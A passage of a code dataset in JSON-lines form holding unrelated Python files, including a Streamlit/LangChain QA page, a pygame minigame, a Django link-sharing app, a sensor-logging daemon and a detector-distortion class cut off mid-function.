cls.recommender.on_request_models_of_interest(user_id='yandexuid:1009').respond(\n {'models': map(str, list(range(96, 101))), 'timestamps': map(str, model_ids)}\n )\n cls.recommender.on_request_models_of_interest(\n user_id='yandexuid:1009', item_count=40, with_timestamps=True\n ).respond({'models': map(str, list(range(96, 101))), 'timestamps': map(str, model_ids)})\n\n def test_popular_products(self):\n \"\"\"\n Проверка пэйджинга для popular_products\n \"\"\"\n self.assertPagingSupportedForModels(\n base_query='place=popular_products&rids=213&hid=9200&yandexuid=1009&rgb=green&rearr-factors=switch_popular_products_to_dj_no_nid_check=0',\n ids=[91, 92, 93, 94, 95],\n )\n\n def test_popular_products_blue(self):\n \"\"\"\n Проверка пэйджинга для popular_products&rgb=blue\n \"\"\"\n self.assertPagingSupportedForModels(\n base_query='place=popular_products&rids=213&hid=9200&yandexuid=1009&rgb=blue&rearr-factors=switch_popular_products_to_dj_no_nid_check=0',\n ids=[91, 92, 93, 94, 95],\n )\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"Alexander-Berg/2022-test-examples-3","sub_path":"market/GENERAL/test_paging (2).py","file_name":"test_paging (2).py","file_ext":"py","file_size_in_byte":10363,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"20609318639","text":"__import__(\"pysqlite3\")\nimport sys\n\nsys.modules[\"sqlite3\"] = sys.modules.pop(\"pysqlite3\")\n\nimport streamlit as st\nfrom langchain.document_loaders import GCSDirectoryLoader\nfrom langchain.text_splitter import RecursiveCharacterTextSplitter\nfrom langchain.embeddings import VertexAIEmbeddings\nfrom langchain.vectorstores import Chroma\nfrom langchain.chains import RetrievalQA\nfrom langchain.llms import VertexAI\nfrom langchain.chat_models import ChatVertexAI\n\nllm = ChatVertexAI()\n\n\n# def createLoader(bucket):\n# loader = GCSDirectoryLoader(project_name=\"blaa-bi-in-a-box\", bucket=bucket)\n# data = loader.load()\n# return data\n\n\n# def createSplits(data):\n# text_splitter = RecursiveCharacterTextSplitter(chunk_size=500, chunk_overlap=0)\n# all_splits = text_splitter.split_documents(data)\n# return all_splits\n\n\n# def createVectorstore(all_splits):\n# embeddings = VertexAIEmbeddings()\n# vectorstore = Chroma.from_documents(documents=all_splits, embedding=embeddings)\n# retriever = vectorstore.as_retriever()\n# return retriever\n\n\ndef source_button(url: str, text: str = None, color=\"#FD504D\"):\n st.markdown(\n f\"\"\"\n \n \n {text}\n \n \n \"\"\",\n unsafe_allow_html=True,\n )\n\n\ndef createVectorStore(bucket):\n loader = GCSDirectoryLoader(project_name=\"blaa-bi-in-a-box\", bucket=bucket)\n data = loader.load()\n text_splitter = RecursiveCharacterTextSplitter(chunk_size=500, chunk_overlap=0)\n all_splits = text_splitter.split_documents(data)\n embeddings = VertexAIEmbeddings()\n vectorstore = Chroma.from_documents(documents=all_splits, embedding=embeddings)\n return vectorstore.as_retriever(\n search_type=\"similarity\", search_kwargs={\"k\": 3}, max_tokens_limit=256\n )\n\n\ndef answerQuestion(input, retriever):\n qa_chain = RetrievalQA.from_chain_type(\n llm,\n chain_type=\"map_reduce\",\n retriever=retriever,\n return_source_documents=True,\n )\n return qa_chain({\"query\": input})\n\n\nst.title(\"LangChain 🦜🔗\")\n\nif \"success_flag\" not in st.session_state:\n st.session_state.success_flag = False\n\nif \"vector_store\" not in st.session_state:\n st.session_state.vector_store = []\n\nuser_input = st.sidebar.text_input(\n \"Specify the GCS bucket containing your documents here:\"\n)\n\n\nif user_input and not st.session_state.success_flag:\n if st.sidebar.button(\"Initialize Vectorstore\"):\n with st.spinner(\"Initializing...please wait\"):\n result = createVectorStore(user_input)\n st.session_state.vector_store = result\n st.sidebar.success(\"Vectorstore successfully initialized!\")\n st.session_state.success_flag = True\n\nif st.session_state.success_flag:\n st.sidebar.success(\"Vectorstore successfully initialized!\")\n question = st.text_input(\"What would you like to know?\")\n if st.button(\"Submit question\"):\n answer = answerQuestion(question, st.session_state.vector_store)\n st.markdown(answer[\"result\"])\n no_of_result = 0\n for d in answer[\"source_documents\"]:\n no_of_result += 1\n st.header(f\"Chunk number {no_of_result}\")\n st.markdown(d.page_content)\n # st.markdown(d.metadata.get(\"source\"))\n source = d.metadata.get(\"source\")\n source_button(source, \"click to get directed to the source document\")\n st.divider()\n # st.markdown(answer)","repo_name":"marcjwo/streamlit-poc","sub_path":"pages/02_langchain_qa.py","file_name":"02_langchain_qa.py","file_ext":"py","file_size_in_byte":3693,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"113003334","text":"#! coding=UTF-8\n\nfrom tbparser.grammar import Rule, tokenNode as tnode, sequence, zeroToOne, zeroToMany\nfrom tbparser.parser import AstNode\nfrom gobjcreator2.input.grammar.tokens import ID, NAMESPACE_SEP, NAMESPACE_ROOT_SEP, \\\nUNSIGNED, INTEGER, LONG, NULL, BOOLEAN, BYTE, STRING, FLOAT, DOUBLE, POINTER\n\nclass TypeName(Rule):\n \n def __init__(self, ident=''):\n \n Rule.__init__(self, 'typeName', ident)\n \n def expand(self, start, end, context):\n \n start.connect(TypePath('user-defined')).connect(end)\n start.connect(zeroToOne(tnode(UNSIGNED, 'unsigned'))).connect(tnode(INTEGER,'integer')).connect(end)\n start.connect(zeroToOne(tnode(UNSIGNED, 'unsigned'))).connect(tnode(LONG,'long')).connect(end)\n start.connect(tnode(NULL, 'null')).connect(end)\n start.connect(tnode(BOOLEAN, 'boolean')).connect(end)\n start.connect(tnode(BYTE, 'byte')).connect(end)\n start.connect(tnode(STRING, 'string')).connect(end)\n start.connect(tnode(FLOAT, 'float')).connect(end)\n start.connect(tnode(DOUBLE, 'double')).connect(end)\n start.connect(tnode(POINTER, 'pointer')).connect(end)\n \n def transform(self, astNode):\n \n identifiers = {'user-defined': lambda node: node.getText(),\n 'integer': lambda node: self._get_int_or_long(node, astNode),\n 'long': lambda node: self._get_int_or_long(node, astNode),\n 'null': lambda node: node.getText(),\n 'boolean': lambda node: node.getText(),\n 'byte': lambda node: node.getText(),\n 'string': lambda node: node.getText(),\n 'float': lambda node: node.getText(),\n 'double': lambda node: node.getText(),\n 'pointer': lambda node: node.getText()\n }\n \n typeName = ''\n for ident in identifiers: \n node = astNode.getChildById(ident)\n if node:\n typeName = identifiers[ident](node)\n break\n \n return AstNode(self.getName(), typeName)\n \n def _get_int_or_long(self, node, parent):\n \n unsignedNode = parent.getChildById('unsigned')\n if not unsignedNode:\n return node.getText()\n else:\n return 'unsigned %s' % node.getText()\n \nclass TypePath(Rule):\n \n def __init__(self, ident=''):\n \n Rule.__init__(self, 'typePath', ident)\n \n def expand(self, start, end, context):\n \n seq = sequence(tnode(ID), tnode(NAMESPACE_SEP))\n \n start\\\n .connect(zeroToOne(tnode(NAMESPACE_ROOT_SEP)))\\\n .connect(zeroToMany(seq))\\\n .connect(tnode(ID))\\\n .connect(end)\n \n def transform(self, astNode):\n \n typePath = \"\"\n for child in astNode.getChildren():\n typePath += child.getText()\n \n return AstNode(self.getName(), typePath)","repo_name":"ThomasBollmeier/GObjectCreator2","sub_path":"src/gobjcreator2/input/grammar/type_name.py","file_name":"type_name.py","file_ext":"py","file_size_in_byte":3056,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"20557891131","text":"import logging\nimport os\nimport time\n\n\ndef initialise_logger(output_log_path):\n try:\n logger = logging.getLogger(__name__)\n logger.setLevel(logging.DEBUG)\n log_folder = output_log_path\n os.makedirs(log_folder, exist_ok=True)\n log_file = os.path.join(log_folder, \"eks_monitoring.log\")\n logging.basicConfig(\n filename=log_file,\n filemode=\"w\",\n level=logging.DEBUG,\n format=\"%(asctime)s,%(levelname)-8s [%(filename)s:%(lineno)d] %(message)s\",\n datefmt=\"%Y-%m-%d:%H:%M:%S\",\n )\n logger.info(\"created at \" + str(time.ctime()))\n return logger\n except Exception as ex:\n print(ex)\n print(\"Failed to create log file: might be due to invalid path\")\n exit(1)\n","repo_name":"abhishekpatare/eks_monitoring_v2","sub_path":"logging_config.py","file_name":"logging_config.py","file_ext":"py","file_size_in_byte":792,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"6237393674","text":"import sys\nfrom functools import partial\nfrom patchworkorange.core.minigamemanager import Minigame\nfrom logging import getLogger\nimport pygame\nimport random\nfrom pygame import USEREVENT as TIMER_ID\nfrom pygame.sprite import Group, Sprite\nfrom patchworkorange.core import resources\nimport os\n\nfrom animation import Animation\n\nlogger = getLogger(__name__)\n\nWINDOW_SIZE = (1280, 720)\n\n\nclass Xbill(Minigame):\n GAME_NAME = \"Xbill\"\n\n UPDATE_FREQUENCY = 300\n FRAME_DELAY = 1000.0 / 60.0\n\n GAME_DURATION = 60*1000\n\n BILL_SPAWN_INTERVAL = 2 * 1000\n\n def __init__(self, **kwargs):\n self.background = None\n self.screen = None\n self.clock = None\n self.font = None\n self.terminals = []\n self.bills = []\n self.floating_texts = []\n self.countdown = 0\n\n def initialize(self, context):\n self.screen = pygame.display.set_mode(WINDOW_SIZE)\n self.clock = pygame.time.Clock()\n self.font = pygame.font.SysFont(\"monospace\", 15, bold=True)\n\n self.countdown = Xbill.GAME_DURATION\n\n self.terminals.append(Terminal(640, 360))\n self.terminals.append(Terminal(740, 160))\n self.terminals.append(Terminal(840, 260))\n self.terminals.append(Terminal(540, 260))\n self.terminals.append(Terminal(440, 320))\n self.terminals.append(Terminal(340, 420))\n self.terminals.append(Terminal(790, 320))\n self.terminals.append(Terminal(256, 128))\n self.terminals.append(Terminal(1060, 425))\n self.terminals.append(Terminal(900, 550))\n\n pygame.display.set_caption(Xbill.GAME_NAME)\n pygame.mouse.set_visible(True)\n\n pygame.time.set_timer(TIMER_ID+1, Xbill.BILL_SPAWN_INTERVAL)\n\n def run(self, context):\n game_loop = True\n delta_accumulater = 0.0\n while game_loop:\n delta = self.clock.tick(self.UPDATE_FREQUENCY)\n delta_accumulater += delta\n if delta_accumulater >= self.FRAME_DELAY:\n self.render()\n delta_accumulater = 0.0\n game_loop = self.update(delta)\n pygame.display.flip()\n\n if self.countdown <= 0:\n context[\"{}.won\".format(self.GAME_NAME)] = \"true\"\n pygame.mouse.set_visible(False)\n\n # TODO: Wat to do here?\n \"\"\" \n if self.get_free_terminal() is not None:\n context[\"{}.won\".format(self.GAME_NAME)] = \"false\"\n \"\"\"\n\n def update(self, delta):\n if not self.handle_events(delta):\n return False\n\n for terminal in self.terminals:\n terminal.update(delta)\n\n for floating_text in self.floating_texts[:]:\n if not floating_text.update(delta):\n self.floating_texts.remove(floating_text)\n\n for bill in self.bills[:]:\n bill.update(delta)\n if bill.destroy:\n self.bills.remove(bill)\n\n self.countdown -= delta\n if self.countdown <= 0:\n logger.debug(\"you win\")\n pygame.mouse.set_visible(False)\n return False\n\n return True\n\n def render(self):\n self.screen.fill(pygame.Color(\"BLACK\"))\n\n for terminal in self.terminals:\n terminal.render(self.screen)\n\n for bill in self.bills:\n bill.render(self.screen)\n\n for floating_text in self.floating_texts:\n floating_text.render(self.screen)\n\n self.render_time(self.screen)\n\n def render_time(self, screen):\n label = self.font.render(\"Countdown: \"+str(self.countdown/1000), 1, pygame.Color(\"green\"))\n screen.blit(label, (640-24,16))\n\n def handle_events(self, delta):\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n sys.exit(0)\n if event.type == pygame.MOUSEBUTTONDOWN:\n return self.handle_mouse_click(event)\n if event.type == TIMER_ID+1: # create bill and send towards terminal\n self.bills.append(self.send_bill())\n free_terminal = self.get_free_terminal()\n if free_terminal is None:\n logger.debug(\"you lose\")\n return False\n self.bills[-1].goto_terminal(free_terminal)\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_s:\n self.countdown = 0\n\n return True\n\n def handle_mouse_click(self, event):\n for terminal in self.terminals:\n if terminal.rect.collidepoint(event.pos):\n if terminal.block_duration == 0 and not terminal.infected:\n terminal.prevent_patch()\n x, y = terminal.pos\n self.floating_texts.append(FloatingText(x-16, y-16, \"Blocked!\", self.font))\n return True\n\n def get_free_terminal(self):\n free_terminals = [terminal for terminal in self.terminals if not terminal.infected]\n if len(free_terminals) > 0:\n return random.choice(free_terminals)\n else:\n return None\n\n def send_bill(self):\n area = random.randint(1, 4)\n width = 16\n x, y = (0, 0)\n if area == 1: # LEFT\n x, y = (16, random.randint(width, 720-width*3))\n if area == 2: # RIGHT\n x, y = (1280-width*3, random.randint(width, 720-width*3))\n if area == 3: # TOP\n x, y = (random.randint(width, 1280-width*3), width)\n if area == 4: # BOTTOM\n x, y = (random.randint(width, 1280-width*3), 720-width*3)\n return Bill(x, y)\n\nclass Terminal(Sprite):\n SIZE = (32, 32)\n\n def __init__(self, x, y):\n super(Terminal, self).__init__()\n self.image = pygame.image.load(resources.get_image_asset(os.path.join(\"xbill\", \"terminal.png\"))).convert()\n self.pos = (x, y)\n self.rect = pygame.Rect(self.pos, Terminal.SIZE)\n self.block_duration = 0.0\n self.patch_progress = 0.0\n self.infected = False\n self.neighors = []\n\n def render(self, screen):\n screen.blit(self.image, self.rect)\n\n def update(self, delta):\n self.rect.topleft = self.pos\n self.block_duration = max(0, self.block_duration-delta)\n\n def prevent_patch(self):\n self.block_duration = 2 * 1000\n\nclass Bill(Sprite):\n SIZE = (32, 50)\n def __init__(self, x, y):\n super(Bill, self).__init__()\n self.image = pygame.image.load(resources.get_image_asset(os.path.join(\"xbill\", \"bill.png\"))).convert()\n self.pos = (x, y)\n self.animations = Group()\n self.rect = pygame.Rect(self.pos, Bill.SIZE)\n self.destroy = False\n self.image.set_colorkey((255, 0, 255))\n\n def render(self, screen):\n screen.blit(self.image, self.rect)\n\n def update(self, delta):\n self.animations.update(delta)\n\n def goto_terminal(self, terminal):\n x, y = terminal.pos\n x_anim = Animation(self.rect, centerx=x, duration=4000)\n y_anim = Animation(self.rect, centery=y, duration=4000)\n self.animations.add(x_anim)\n self.animations.add(y_anim)\n x_anim.schedule(partial(self.on_arrived_at_terminal, terminal), \"on finish\")\n\n def on_arrived_at_terminal(self, terminal):\n if terminal.block_duration == 0:\n terminal.infected = True\n terminal.image = pygame.image.load(resources.get_image_asset(os.path.join(\"xbill\", \"terminal_infected.png\"))).convert()\n self.destroy = True\n\nclass FloatingText(object):\n def __init__(self, x, y, label, font):\n self.pos = (x, y)\n self.label = font.render(label, 1, pygame.Color(\"white\"))\n self.life_time = 2 * 1000\n\n def render(self, screen):\n screen.blit(self.label, self.pos)\n\n def update(self, delta):\n self.life_time -= delta\n x, y = self.pos\n self.pos = (x, y-0.04)\n if self.life_time <= 0:\n return False\n return True\n","repo_name":"bitcraft/pyweek25","sub_path":"patchworkorange/minigames/xbill/Xbill.py","file_name":"Xbill.py","file_ext":"py","file_size_in_byte":7954,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"}
{"seq_id":"13722256899","text":"# Q10 Write a Python program to find minimum and maximum value in a list.\n\ndef find_min_max(list):\n min_value = list[0]\n max_value = list[0]\n for value in list:\n if value < min_value:\n min_value = value\n if value > max_value:\n max_value = value\n return (min_value, max_value)\n\nlist = []\nn = int(input(\"Enter the number of elements in the list: \"))\nfor i in range(n):\n element = int(input(\"Enter element {}: \".format(i + 1)))\n list.append(element)\n\nmin_value, max_value = find_min_max(list)\nprint(\"The minimum value is:\", min_value)\nprint(\"The maximum value is:\", max_value)","repo_name":"arnavjain2710/DBMS-LAB-WORK","sub_path":"LAB 3/p10.py","file_name":"p10.py","file_ext":"py","file_size_in_byte":599,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"15053930459","text":"H,W = (int(x) for x in input().split())\r\nfig = [['#' for x in range(W+2)]]\r\norg = [['.' for x in range(W+2)] for y in range(H+2)]\r\narea = [[-1,-1],[-1,0],[-1,1],\r\n [0,-1],[0,1],\r\n [1,-1],[1,0],[1,1]]\r\npos = True\r\n\r\nfor i in range(H):\r\n S = list(input())\r\n fig.append(['#'] + S + ['#'])\r\n\r\nfig += [['#' for x in range(W+2)]]\r\n\r\nfor i in range(1,H+1):\r\n for j in range(1,W+1):\r\n if fig[i][j] == '#':\r\n if all((fig[i+k[0]][j+k[1]] == '#' for k in area)):\r\n org[i][j] = '#'\r\n else:\r\n org[i][j] = '?'\r\n\r\nfor i in range(1,H+1):\r\n for j in range(1,W+1):\r\n if org[i][j] == '?':\r\n if all((org[i+k[0]][j+k[1]] != '#' for k in area)):\r\n pos = False\r\n break\r\n org[i][j] = '.'\r\n else:\r\n continue\r\n break\r\n\r\nif pos:\r\n print('possible')\r\n for i in range(1,H+1):\r\n for j in range(1,W+1):\r\n print(org[i][j], end='')\r\n print()\r\nelse:\r\n print('impossible')","repo_name":"Kawser-nerd/CLCDSA","sub_path":"Source Codes/AtCoder/abc039/D/4877413.py","file_name":"4877413.py","file_ext":"py","file_size_in_byte":1028,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"72"}
{"seq_id":"34635459964","text":"import logging\nimport signal\nimport sys\nimport time\nfrom datetime import datetime, timedelta\nfrom queue import Queue\n\nimport framework.settings\nimport serialIO.streamDecoder\nfrom daemon.DataBaseConnector import DataBaseConnector as Dbcon\nfrom daemon.HtmlConfigStructure import HtmlConfig\nfrom daemon.HtmlCreator import HtmlCreator as HtmlCreator\nfrom daemon.PlotCreator import PlotCreator as PlotCreator\nfrom serialIO.serialThread import Worker\nfrom serialIO.streamDecoder import StreamDecoder as StreamDecoder\n\n\n# Desiderata:\n# Ungültige Sensordaten kennzeichnen und nicht mehr in die db schieben\n# (ticks checken und wenn zu alt aus liste löschen)\n\n\n# ctrl+c signal handler\ndef signal_handler(sig, frame):\n print('Exit requested, waiting for all threads to exit.')\n ThetaMonDaemon.exit_requested = True\n\n\nclass ThetaMonDaemon:\n exit_requested = False\n update_db_freq = 5 # [min]\n\n # update_db_freq = 1 # [min]\n\n def __init__(self, settings_in: framework.settings.AppSettings):\n self.settings = settings_in\n self.serial_queue = Queue()\n self.txt_queue = Queue()\n self.bin_queue = Queue()\n self.stream_decoder = StreamDecoder(self.txt_queue, self.bin_queue)\n self.sensor_val_dic = {} # { sensorId, MeasurementType }\n self.statistic_dic = {} # { sensorId, RadioStatisticsType }\n self.html_conf = HtmlConfig(self.settings)\n self.worker = None\n signal.signal(signal.SIGINT, signal_handler)\n self.db = Dbcon(self.settings)\n self.next_time = \\\n datetime.now() + timedelta(hours=0, minutes=self.update_db_freq)\n self.plot_creator = PlotCreator(self.settings, self.db, self.html_conf)\n self.html_creator = HtmlCreator(self.settings, self.db, self.html_conf)\n self.entry()\n\n def entry(self):\n device = self.settings.get(\"common\", \"serial_port\")\n self.worker = Worker(self.serial_queue, device, 115200, 0.5)\n self.worker.start()\n self.db.connect()\n self.create_html() # initial creation\n\n while 1:\n if self.exit_requested:\n self.worker.request_exit()\n self.db.close()\n sys.exit(0)\n # consume serial queues\n self.update_queues()\n self.bin_queue_to_struct()\n if datetime.now() >= self.next_time:\n self.next_time = \\\n datetime.now() + timedelta(hours=0, minutes=self.update_db_freq)\n self.push_dicts_to_db()\n self.create_html()\n time.sleep(1.0) # we could sleep for update_db_freq\n\n def update_queues(self):\n data = None\n for j in range(self.serial_queue.qsize() - 1):\n data = self.serial_queue.get(block=True, timeout=0.2)\n if data is None:\n return\n self.stream_decoder.proc_serial_stream(data)\n\n def bin_queue_to_struct(self):\n while self.bin_queue.qsize() > 0:\n bin_msg = self.bin_queue.get(block=True, timeout=None)\n if bin_msg.msgClass == serialIO.streamDecoder.MEASUREMENT_ENUM:\n self.sensor_val_dic[bin_msg.sensorIdHash] = bin_msg\n elif bin_msg.msgClass == serialIO.streamDecoder.STATISTICS_ENUM:\n self.statistic_dic[bin_msg.stationId] = bin_msg\n self.bin_queue.task_done()\n\n def push_dicts_to_db(self):\n sens_dat_count = 0\n stat_dat_count = 0\n for msmnt in self.sensor_val_dic.values():\n self.db.update_sensordata(msmnt)\n sens_dat_count += 1\n for stats in self.statistic_dic.values():\n self.db.update_stationdata_tbl(stats)\n stat_dat_count += 1\n self.statistic_dic.clear()\n self.sensor_val_dic.clear()\n if sens_dat_count > 0:\n logging.getLogger().info(\n \"Updated sensordata with {} items\".format(sens_dat_count))\n if stat_dat_count > 0:\n logging.getLogger().info(\n \"Updated stationdata with {} items.\".format(stat_dat_count))\n\n def create_html(self):\n start = time.time()\n self.plot_creator.create_plots()\n end = time.time()\n logging.getLogger().info(\"Time needed to create plots: {}\"\n .format(end - start))\n self.html_creator.create_html_pages()\n\n","repo_name":"Linoprint/ThetaMonitorNetwork","sub_path":"SBC/ThetaMonitorSerial/daemon/ThetaMonDaemon.py","file_name":"ThetaMonDaemon.py","file_ext":"py","file_size_in_byte":4370,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"}
{"seq_id":"7035726591","text":"import time\nimport numpy as np\n\nimport ex_sum_py, ex_fib_py, ex_sort_py\nimport ex_sum_cy, ex_fib_cy, ex_sort_cy\n\n\ndef time_function(f, x):\n t = time.time()\n f(x)\n return time.time() - t\n\n\nif __name__ == '__main__':\n t_py = time_function(ex_sum_py.get_sum, x=1_000_000)\n t_cy = time_function(ex_sum_cy.get_sum, x=1_000_000)\n print(f'ex_sum: t_py={t_py:.6f}, t_cy={t_cy:.6f}')\n\n t_py = time_function(ex_fib_py.get_series, x=10_000)\n t_cy = time_function(ex_fib_cy.get_series, x=10_000)\n print(f'ex_fib: t_py={t_py:.6f}, t_cy={t_cy:.6f}')\n\n array = np.random.randint(100, size=1_000, dtype=np.int32)\n t_py = time_function(ex_sort_py.sort, x=array)\n t_cy = time_function(ex_sort_cy.sort, x=array)\n print(f'ex_sort: t_py={t_py:.6f}, t_cy={t_cy:.6f}')","repo_name":"suhren/cython","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":784,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"}
{"seq_id":"11749026138","text":"from django.shortcuts import render, redirect\nfrom linkworld.models import Post, Comment, Vote\nfrom django.shortcuts import get_object_or_404, resolve_url\nfrom linkworld.forms import PostForm, CommentForm\nfrom django.contrib.auth.decorators import login_required\nfrom django.conf import settings\nfrom django.db.models import Count\nfrom django.contrib import messages\n\n\ndef index(request):\n    posts = Post.objects.annotate(vote_counts=Count(\n        'votes')).order_by(\"-vote_counts\", \"-date\")\n    comments = Comment.objects.all().order_by(\"-date\")\n    return render(request, 'index.html', {'posts': posts, 'comments': comments,\n                                          })\n\n\ndef sort_by_date(request):\n    posts = Post.objects.order_by(\"-date\")\n    return render(request, 'index.html', {'posts': posts,\n                                          })\n\n\ndef sort_by_likes(request):\n    posts = Post.objects.annotate(vote_counts=Count(\n        'votes')).order_by(\"-vote_counts\", \"-date\")\n\n    return render(request, 'index.html', {'posts': posts,\n                                          })\n\n\ndef post_detail(request, slug):\n\n    post = Post.objects.get(slug=slug)\n\n    return render(request, 'posts/post_detail.html', {\n        'post': post,\n\n    })\n\n\n@login_required\ndef new_post(request):\n\n    form = PostForm(request.POST)\n    if request.method == \"POST\":\n        if form.is_valid():\n            new_post = form.save(commit=False)\n            new_post.author = request.user\n            new_post.save()\n            messages.success(request, 'Your post is up on the site!')\n            return redirect('home')\n    else:\n        form = PostForm()\n\n    return render(request, 'posts/new_post.html', {'form': form})\n\n\n@login_required\ndef delete_new_post(request):\n    if request.POST.get('pk'):\n        post = get_object_or_404(Post, pk=request.POST.get('pk'))\n        if post.author == request.user:\n            post.delete()\n            messages.success(request, 'Your post has been deleted.')\n        else:\n            messages.warning(\n                request, 'Sorry you are not authorized to delete this post')\n\n    return redirect('home')\n\n\n@login_required\ndef comment_on_post(request, slug):\n    post = get_object_or_404(Post, slug=slug)\n    if request.method == \"POST\":\n        form = CommentForm(request.POST)\n        if form.is_valid():\n            comment = form.save(commit=False)\n            comment.post = post\n            comment.commenter = request.user\n            comment.save()\n            messages.success(\n                request, 'Great, thanks for commenting! Check it out on the post!')\n            return redirect('post_detail', slug=post.slug)\n        else:\n            messages.warning(\n                request, 'Sorry something went wrong! Please submit again!')\n    else:\n        form = CommentForm()\n    return render(request, 'posts/comment_on_post.html', {'form': form})\n\n\n@login_required\ndef delete_comment(request):\n\n    if request.POST.get('pk'):\n        comment = get_object_or_404(Comment, pk=request.POST.get('pk'))\n        post = comment.post\n        if comment.commenter == request.user:\n            comment.delete()\n            messages.success(request, 'Your comment has been deleted.')\n        else:\n            messages.warning(request, 'Sorry you are not authorized to delete this comment'\n                             )\n    return redirect('post_detail', slug=post.slug)\n\n\n@login_required\ndef upvote(request, slug):\n\n    post = get_object_or_404(Post, slug=slug)\n    if request.method == \"POST\":\n        if not Vote.objects.filter(post=post, user=request.user):\n            Vote.objects.create(post=post, user=request.user)\n            messages.success(request, 'Thanks for liking!')\n        else:\n            messages.info(request, 'You have already liked this post.')\n    return redirect(('{}#' + post.slug).format(resolve_url('home')))\n","repo_name":"momentum-cohort-2018-10/w5-apile-sow-awesome","sub_path":"linkworld/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3898,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"13451669614","text":"from my_personal_website.common import *\nimport os\nimport django_heroku\n\n# SECURITY WARNING: don't run with debug turned on in production!\nDEBUG = False\n\n\n\nSECRET_KEY = os.environ['SECRET_KEY']\n\n#update this to be heroku\nALLOWED_HOSTS = ['*', '.herokuapp.com']\n\n\n# PROJECT_ROOT = os.path.dirname(os.path.abspath(__file__))\n# STATIC_URL = '/static/'\n# STATIC_ROOT = \"andrew-lin.herokuapp.com/static/\"\n\nBASE_DIR = os.path.dirname(os.path.dirname(__file__))\nSTATIC_ROOT = os.path.join(BASE_DIR, 'staticfiles')\nSTATIC_URL = '/static/'\nSTATICFILES_DIRS = (\n    os.path.join(BASE_DIR, 'website/static'),\n)\n\n# django_heroku.settings(locals())","repo_name":"arobertlin/PersonalWebsite","sub_path":"my_personal_website/production_settings.py","file_name":"production_settings.py","file_ext":"py","file_size_in_byte":635,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"43877530624","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Jan 21 15:07:34 2021\n\n@author: Joel V. Bernier\n\"\"\"\nimport numpy as np\n\nfrom hexrd import constants\nfrom hexrd.constants import USE_NUMBA\nif USE_NUMBA:\n    import numba\n\nfrom .distortionabc import DistortionABC\nfrom .registry import _RegisterDistortionClass\n\n\nclass Dexela_2923(DistortionABC, metaclass=_RegisterDistortionClass):\n\n    maptype = \"Dexela_2923\"\n\n    def __init__(self, params, **kwargs):\n        self._params = np.asarray(params, dtype=float).flatten()\n\n    @property\n    def params(self):\n        return self._params\n\n    @params.setter\n    def params(self, x):\n        assert len(x) == 8, \"parameter list must have len of 8\"\n        self._params = np.asarray(x, dtype=float).flatten()\n\n    @property\n    def is_trivial(self):\n        return np.all(self.params == 0)\n\n    def apply(self, xy_in):\n        if self.is_trivial:\n            return xy_in\n        else:\n            xy_out = np.empty_like(xy_in)\n            _dexela_2923_distortion(\n                xy_out, xy_in, np.asarray(self.params)\n            )\n            return xy_out\n\n    def apply_inverse(self, xy_in):\n        if self.is_trivial:\n            return xy_in\n        else:\n            xy_out = np.empty_like(xy_in)\n            _dexela_2923_inverse_distortion(\n                xy_out, xy_in, np.asarray(self.params)\n            )\n            return xy_out\n\n\ndef _find_quadrant(xy_in):\n    quad_label = np.zeros(len(xy_in), dtype=int)\n    in_2_or_3 = xy_in[:, 0] < 0.\n    in_1_or_4 = ~in_2_or_3\n    in_3_or_4 = xy_in[:, 1] < 0.\n    in_1_or_2 = ~in_3_or_4\n    quad_label[np.logical_and(in_1_or_4, in_1_or_2)] = 1\n    quad_label[np.logical_and(in_2_or_3, in_1_or_2)] = 2\n    quad_label[np.logical_and(in_2_or_3, in_3_or_4)] = 3\n    quad_label[np.logical_and(in_1_or_4, in_3_or_4)] = 4\n    return quad_label\n\n\nif USE_NUMBA:\n    @numba.njit(nogil=True, cache=True)\n    def _dexela_2923_distortion(out_, in_, params):\n        for el in range(len(in_)):\n            xi, yi = in_[el, :]\n            if xi < 0.:\n                if yi < 0.:\n                    # 3rd quadrant\n                    out_[el, :] = in_[el, :] + params[4:6]\n                else:\n                    # 2nd quadrant\n                    out_[el, :] = in_[el, :] + params[2:4]\n            else:\n                if yi < 0.:\n                    # 4th quadrant\n                    out_[el, :] = in_[el, :] + params[6:8]\n                else:\n                    # 1st quadrant\n                    out_[el, :] = in_[el, :] + params[0:2]\n\n    @numba.njit(nogil=True, cache=True)\n    def _dexela_2923_inverse_distortion(out_, in_, params):\n        for el in range(len(in_)):\n            xi, yi = in_[el, :]\n            if xi < 0.:\n                if yi < 0.:\n                    # 3rd quadrant\n                    out_[el, :] = in_[el, :] - params[4:6]\n                else:\n                    # 2nd quadrant\n                    out_[el, :] = in_[el, :] - params[2:4]\n            else:\n                if yi < 0.:\n                    # 4th quadrant\n                    out_[el, :] = in_[el, :] - params[6:8]\n                else:\n                    # 1st quadrant\n                    out_[el, :] = in_[el, :] - params[0:2]\nelse:\n    def _dexela_2923_distortion(out_, in_, params):\n        # find quadrant\n        ql = _find_quadrant(in_)\n        ql1 = ql == 1\n        ql2 = ql == 2\n        ql3 = ql == 3\n        ql4 = ql == 4\n        out_[ql1, :] = in_[ql1] + np.tile(params[0:2], (sum(ql1), 1))\n        out_[ql2, :] = in_[ql2] + np.tile(params[2:4], (sum(ql2), 1))\n        out_[ql3, :] = in_[ql3] + np.tile(params[4:6], (sum(ql3), 1))\n        